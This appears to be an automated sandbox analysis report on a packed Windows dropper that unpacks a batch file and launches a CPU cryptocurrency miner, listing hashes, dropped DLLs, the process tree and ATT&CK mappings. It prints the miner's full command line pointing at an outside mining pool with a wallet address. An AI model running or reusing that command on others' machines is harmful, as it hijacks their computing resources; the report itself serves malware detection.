73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
302s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
13/02/2024, 04:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3264	b2e.exe
4356	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4356	cpuminer-sse2.exe
4356	cpuminer-sse2.exe
4356	cpuminer-sse2.exe
4356	cpuminer-sse2.exe
4356	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/5040-4-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5040 wrote to memory of 3264	5040	batexe.exe	74
PID 5040 wrote to memory of 3264	5040	batexe.exe	74
PID 5040 wrote to memory of 3264	5040	batexe.exe	74
PID 3264 wrote to memory of 4776	3264	b2e.exe	75
PID 3264 wrote to memory of 4776	3264	b2e.exe	75
PID 3264 wrote to memory of 4776	3264	b2e.exe	75
PID 4776 wrote to memory of 4356	4776	cmd.exe	78
PID 4776 wrote to memory of 4356	4776	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5040
- C:\Users\Admin\AppData\Local\Temp\A539.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\A539.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\A539.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A8A4.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4776
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4356

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\A539.tmp\b2e.exe

Filesize
3.1MB

MD5
820be66bb6b13540348dd2ab3e9e6092

SHA1
7a7ba4eba7bcd2f77afdbb5ebfb44d23ffd5bfc4

SHA256
aa350d35f36aa19efd06617de613bde74c9049beae23e4a18b09562fce5971a9

SHA512
a83cf68591c2b43f286dd178a3ce231765987811f3add042e14d4f6840dea4f7ca7beda1a4910f49bf13a4867b3532e9d831f7ab0cebbc8b8520b4a7ea50a699

Download Submit
C:\Users\Admin\AppData\Local\Temp\A539.tmp\b2e.exe

Filesize
2.9MB

MD5
c6f3128c4026515a494e15efffd86fc9

SHA1
9c5fa95b40891b355cfab5e679bcd9a3759cc963

SHA256
344e2cd072ee60eb4860ade14754f750dc9c360b0bab1253092cbc23d9263f0d

SHA512
43387038e7904e0247bcd10f7eb82148011980f1db51130b742bda6b83976620252cdd06eb7dc2f572b72fe554d2041b0831219ba7638c9f8cd312ec3d2a89c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8A4.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
666KB

MD5
2f850374d94cc487577116bab6134908

SHA1
64f707c0f26c9bdac31a72b135676ab4dea2fedb

SHA256
c7c7580617845a47790a770fcba3bb649076baf2492d68bab89646daec24870b

SHA512
fb014347d32ed4f95fed3a13ca45d62fa710039dc21a54c0c7875a96a43f6a43fd1403919bdfd529501514ec42ea7c549103cb8c63383a50f3251787caf278ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
574KB

MD5
229dc3283f5b95ad4b73638e59c17e14

SHA1
9ade01cd5cd08150a7b2f875df509db1ed571cc1

SHA256
8339d02ee5b2dae90a34ac0903aea0bab2cef95069d2cd66b58dca7f83a28256

SHA512
5be39e4197c13735106baa03393c11121f4bf7f471a5a1def18366b494bc625ac9786673186f51992c969c9bb9ed1e5ff644031cb0b9e34e3b791cff4d569b30

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
755KB

MD5
e73d46027e4bde52855bf002f64305af

SHA1
560ba11f8dbe595d0ce1204a6c0d4e00e1bce438

SHA256
a06489b0d8371c63318deb2659bd72fe00086e134178a4ff3a89b46e9c14a330

SHA512
20b7f5f8cddbf4052bf75352264c8ae3d6b1f9e662dcaecc4442809be92d7b8c9a624021ffdfa306e5d14d0ef6d1f5b6b510533c926faf856821cfaa5b03f571

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
614KB

MD5
aca1a0ba4310e59447d4401600cc456a

SHA1
af4f156e98ae59d6f3840b6fd7b2fe062a8c59d2

SHA256
b0588e9e01237c1202299fcbb7bdab2ab31427731176b4ee2e90036c7c28da3d

SHA512
3576b09905ec7e3ed412a63355b1c1c01eee0c7b9e6570ccc02e1949ba85994e2afabb1fe5d6aaf2b48f669d132b43c2dfa025de2eb0f9f6b6d87ab398cec929

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
628KB

MD5
3a91b4e4ad799a6fc0f7024d30098758

SHA1
700a9fca1946ca9601a46445468745744a866530

SHA256
e1909c21d9e85ec895c05042812a6e42f0d050a5edaf993442fb7773fcddeafc

SHA512
81261f0fe8b1506757528b37f0e4f62608d9c1af6158701abdb052d05ab5ea040f4e395a81c9f4bfb2d984d088539ae336586909372edbdab28fd6dcb6d115f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
582KB

MD5
d5b1e6235d0b3401cf860165686bab48

SHA1
7391d2f7b6ac7331032fc0417c2733fcd14a2aab

SHA256
49625cde12a47437a4dc46491015f7432a342ead5aec00b3a70454532edc2e8c

SHA512
d1e1b3325fd572fc453d9b8a5f241fb10df1bf4c207b9d7dbe8cdda35ab9cacae45c44db27a074a987126bc393bb6a56e3d9db97a2fe1a58f0769a41cd75c932

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
553KB

MD5
55fd1b4a7d60c1b107af174bbe18f080

SHA1
dcf5b1f5f9f1e8bedbcc86b17927deb2455c5728

SHA256
fb20cff081b442329832de7b6bc82531d7db0bbb87eb18c65ee03eb500bb618e

SHA512
da8793c4325de15376558066d12e0e2b9372a46d74c0921143c7bd9cfa35a9666b04df2acb416262e846a7ad9512f9735c4dc0b1f3010dcc50c375763601c386

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
722KB

MD5
ecdc8f3e521f7f92a56df169acb9f241

SHA1
889acd8137cc5c81263af261d67377405fb3fe4b

SHA256
b19a2b757e34808fa6d37a6a2dcb3c40bf9022ad05dc8451cc06fa35a4deea83

SHA512
c334111e945fb57785746abf46c49b104088d2b2c1fb5237d0aacec9667c032f46699f40288b4fab5633215e0b21dd244af583ada24a08118627b6698c86da28

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
704KB

MD5
e3bef416ca033b158e59ebea2617f4c2

SHA1
421d143f019940baa46e90dbc29438a301fc546a

SHA256
8a2836d6391d96ba6b2dd40fd92a8c0fc830aec2a4db8e7b925f30501ba7d1b8

SHA512
4c223dd37f48ef94828b027d33fb684cb1a16422fe95f2264910a92c8e22cc1881693c044c8ac8453ed67c9c9b014edf914993654c744bf9aeb3de608e7fc024

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
513KB

MD5
313d75aacd30ab499d307e7b173be2e1

SHA1
ce47322f5cdae4c69751e6140036cb3ee7bb43ce

SHA256
13f830aa82475831dff3d190556a3d6f0abf2571466a0e21f273c47f057375d6

SHA512
a2e8ba5240e16542968f946e842a187ef2ca6517e1749ee934ecc1d8d8b67074171489fb330cb7f35a7ff9c07902f1fcddea2030d5df02b3ff8fe612802d6df0

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/3264-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3264-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4356-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4356-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4356-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4356-43-0x00000000667F0000-0x0000000066888000-memory.dmp

Filesize
608KB

Download
memory/4356-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/4356-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4356-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4356-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4356-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4356-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4356-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4356-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4356-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4356-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5040-4-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download